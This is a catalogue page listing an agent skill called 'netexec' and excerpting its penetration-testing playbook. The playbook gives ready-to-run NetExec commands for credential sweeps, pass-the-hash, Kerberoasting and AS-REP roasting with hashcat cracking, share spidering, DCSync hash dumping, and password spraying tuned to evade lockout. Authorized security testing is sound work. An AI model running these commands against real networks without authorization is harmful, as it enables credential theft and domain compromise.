netexec

netexec is a skill for Claude Code, Codex from MingyiSecLab/Mingyi-Atlas. It costs 64 tokens per session (1,840 once invoked), scanned A, a copy of netexec, Apache-2.0.

A command-line security testing tool for checking authentication and running tests across Windows and network services such as SMB, LDAP, MSSQL, WinRM, RDP, SSH, FTP, and VNC. It also includes modules for examining Active Directory, Microsoft's identity system for Windows networks.

In plain words
What is it for?
Testing credentials across networks, collecting data for BloodHound, a tool that maps Active Directory relationships, and scanning certificate-service configurations and other security issues.
Why use it?
It avoids needing separate tools and commands for each supported service during an authorized security assessment.

Skill for Claude CodeCodex

Written for no agent in particular: nothing here depends on one.

Good fit Testing credentials across networks, collecting data for BloodHound, a tool that maps Active Directory relationships, and scanning certificate-service configurations and other security issues.

Compare 6 skills from other repositories ↓
Install with agentmods
npx agentmods add skills/mingyiseclab/mingyi-atlas/netexec
Install

Getting it into your agent

One page per mod, every tool's command on it. A separate URL per tool would split the same page into five that compete with each other.

Any agent
npx skills add MingyiSecLab/Mingyi-Atlas --skill netexec
Clone the repo
git clone --depth 1 https://github.com/MingyiSecLab/Mingyi-Atlas

Made for: Claude Code, Codex.

Wrote this? Show the measurements

A badge with what this costs and how it scanned, read live from this page, so it follows the numbers instead of freezing them. Markdown for a README, HTML for a documentation site or a project page.

agentmods badge for netexec

README.md
[![agentmods](https://agentmods.dev/badge/skills/mingyiseclab/mingyi-atlas/netexec.svg)](https://agentmods.dev/skills/mingyiseclab/mingyi-atlas/netexec)
Your own site
<a href="https://agentmods.dev/skills/mingyiseclab/mingyi-atlas/netexec"><img src="https://agentmods.dev/badge/skills/mingyiseclab/mingyi-atlas/netexec.svg" alt="Measured on agentmods" height="20"></a>
Per session 64 Skills are progressive disclosure: only the name and description are preloaded; the body loads when the skill is used.
When invoked 1,840 The whole file, excluding the scripts and references it only reads on demand.
Security scan A 0 findings. A grade says what 26 rules found in the file — not that it is safe.
Origin 97% copy Near-identical to another mod in the catalogue.
Token cost

What it costs to keep this loaded

Counted locally with the o200k_base tokenizer, which is exact for GPT models; Claude uses its own tokenizer and its counts differ. Treat this as one consistent yardstick across the catalogue rather than a bill. Prices are per million input tokens.

ModelPer sessionOnce invoked
Fable 5.1 $0.00064 $0.01840
Opus 5 $0.00032 $0.00920
Sonnet 5 $0.00013 $0.00368
Haiku 4.5 $0.00006 $0.00184

Measured 8d ago against content hash 6c55ab0715db, method: parsed. Prices are Anthropic first-party input rates as of 2026-09-08, from the pricing page.

Security

Grade A, and why

netexec scanned grade A with 0 findings against 26 rules in 11 categories — prompt injection, anti-refusal, data exfiltration, privilege escalation, supply chain, agent snooping, system-prompt leakage, SSRF and excessive agency — measured 8d ago.

A static scan of the body, not an audit. Every finding is printed with the line that produced it so you can judge whether it matters here. A mod is markdown that instructs an agent; that is exactly why what it instructs is worth reading.

Nothing flagged

None of the 26 patterns this scan looks for appear in this file: no shell pipes, no recursive deletes, no credential paths, no hidden text, no instruction-override or anti-refusal phrasing, no agent-config snooping. That is not a guarantee, it is the absence of the things that are checkable.

Origin

This is a copy

97% identical to netexec — 10 lines differ, which has more behind it and is treated as the original. This page carries a canonical link to it rather than competing with it.

src/skills/standard/ad/netexec/SKILL.md · 178 lines

How it starts

The opening of the file, as written. The whole thing — 178 lines — stays where its author put it; the contents beside it link to each section on GitHub.

NetExec (nxc) Playbook

NetExec is the actively-maintained fork of CrackMapExec (archived 2023). One CLI, 8+ protocols, 200+ modules. The Swiss-army knife of Windows / AD pentest.

1. Install

pipx install netexec      # preferred — isolates deps
# Or:
git clone https://github.com/Pennyw0rth/NetExec && cd NetExec && pipx install .

2. Protocol auth sweep

# Test creds across a subnet — single SMB null bind sweep
nxc smb 10.0.0.0/24

# With creds
nxc smb 10.0.0.0/24 -u alice -p Spring2024!
nxc smb 10.0.0.0/24 -u alice -H aad3b435b51404ee...:31d6cfe0d16ae931...  # NTLM hash

# Across protocols — same creds, different services
nxc ldap   $DC -u alice -p $PW
nxc mssql  10.0.0.5 -u alice -p $PW
nxc winrm  10.0.0.5 -u alice -p $PW
nxc rdp    10.0.0.5 -u alice -p $PW
nxc ssh    10.0.0.5 -u alice -p $PW

# Kerberos auth
nxc smb $DC -u alice -p $PW -k --kdcHost $DC

3. Critical modules

3.1 BloodHound auto-collect (built-in)

nxc ldap $DC -u alice -p $PW --bloodhound --collection All \
  --dns-server $DC_IP
# Drops Zip in current dir, ready to ingest into BloodHound

3.2 ADCS ESC1-15 scan

nxc ldap $DC -u alice -p $PW -M adcs
# Lists all certificates templates + vulnerability flags

3.3 Kerberoasting

nxc ldap $DC -u alice -p $PW --kerberoasting kerb.hashes
hashcat -m 13100 kerb.hashes wordlist.txt

3.4 AS-REP roasting

nxc ldap $DC -u alice -p $PW --asreproast asrep.hashes
hashcat -m 18200 asrep.hashes wordlist.txt

3.5 Spider SMB shares

nxc smb 10.0.0.0/24 -u alice -p $PW \
  --spider-plus --extensions txt,xml,config,ini,xls,xlsx,docx \
  --output-folder /tmp/spider

3.6 DC sync (when authorized as DA)

nxc smb $DC -u administrator -p $PW --ntds drsuapi
# Drops ntds.dit hashes to stdout/output

3.7 Password spray (with lockout protection)

nxc smb $DC --users users.txt -p 'Spring2024!' --threads 1 --jitter 30
# Slow + jittered to evade lockout

Read the full file on GitHub · 178 lines

Changes

What this file has done since we first saw it

Hashed on every crawl. A supply-chain change to an agent config is a question of when, not whether, so the history is kept rather than the latest state alone.

  1. 8d ago First seen · 178 lines · 64 tokens per session scan A 6c55ab0715db

Subscribe to this mod's changes

netexec is a skill published in the GitHub repository MingyiSecLab/Mingyi-Atlas (11 stars, last pushed 2mo ago), licensed Apache-2.0. It adds 64 tokens to every session and 1,840 once invoked, about $0.0003 per session on Opus 5. A static security scan graded it A with 0 findings. It is 97% identical to netexec, differing in 10 lines, and is treated as a copy.